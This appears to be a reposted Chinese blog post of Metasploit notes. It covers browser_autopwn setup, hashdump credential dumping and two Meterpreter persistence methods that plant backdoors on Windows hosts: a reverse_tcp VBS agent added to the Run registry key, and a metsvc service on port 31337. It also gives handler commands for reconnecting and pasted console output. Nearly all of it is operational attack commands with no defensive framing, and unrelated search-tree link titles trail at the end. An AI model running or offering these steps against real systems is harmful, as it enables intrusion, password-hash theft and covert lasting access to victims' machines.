search autopwn

Posted journeyIT

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了search autopwn相关的知识,希望对你有一定的参考价值。

search autopwn

 
use server/browser_autopwn
 
show options
 
set LHOST 
 
set SRVPORT
 
set URIPATH /
 
show options
 
修改 etter.conf 文件
if you use ipchains
if you use iptables
 
 
 
 
 
 
 
得到sessions后
 
run hashdump
 
run persistence -X -i 5 -p 445 -r 192.168.1.106
 
 
Metasploit之建立backdoor一二
 
1.meterpreter自带脚本 
 
方法1.run presistence 
 
可以使用run presistence -h查看选项: 
 
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 
[*] Running Persistance Script 
[*] Resource file for cleanup created at 
/root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc 
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 
 
LPORT=443 
[*] Persistent agent script is 609496 bytes long 
[+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs 
[*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs 
[+] Agent executed with PID 3272 
[*] Installing into autorun as HKCU\Software\Microsoft\Windows 
\CurrentVersion\Run\FCBCUBtLrzFY 
[+] Installed into autorun as HKCU\Software\Microsoft\Windows 
 
\CurrentVersion\Run\FCBCUBtLrzFY
可以看到添加启动是通过,添加注册表键值,启动的是vbs脚本的后门。 
 
连接: 
 
msf > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
payload => windows/metsvc_bind_tcp 
msf  exploit(handler) > set LHOST 192.168.1.139 
LHOST => 192.168.1.139 
msf  exploit(handler) > set LPORT 443 
LPORT => 443 
msf  exploit(handler) > exploit 
 
[*] Started bind handler 
[*] Starting the payload handler...
默认没启动,目标机重启后,可以成功获得meterpreter shell 
 
方法2.run metsvc 
 
执行metsvc 脚本 
 
meterpreter > run metsvc -A 
[*] Creating a meterpreter service on port 31337 
[*] Creating a temporary installation directory C:\WINDOWS\TEMP 
 
\kqaqtcsWhBTbO... 
[*]  >> Uploading metsrv.dll... 
[*]  >> Uploading metsvc-server.exe... 
[*]  >> Uploading metsvc.exe... 
[*] Starting the service... 
   * Installing service metsvc 
* Starting service 
Service metsvc successfully installed. 
 
[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...
新建的服务,加自启动(映像名称metsvc.exe,服务metsvc ),连接到后门: 
 
msf > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
payload => windows/metsvc_bind_tcp 
msf  exploit(handler) > set LPORT 31337 
LPORT => 31337 
msf  exploit(handler) > set RHOST 192.168.1.108 
RHOST => 192.168.1.108 
msf  exploit(handler) > exploit 
 
[*] Started bind handler 
[*] Starting the payload handler... 
 
meterpreter >
成功连接 

以上是关于search autopwn的主要内容,如果未能解决你的问题,请参考以下文章

700. Search in a Binary Search Tree

search - binary search

eclipse在search的时候,通过search打开的页面会覆盖之前打开的页面

[Math] Beating the binary search algorithm – interpolation search, galloping search

search - binary search/sort tree

Search in a Binary Search Tree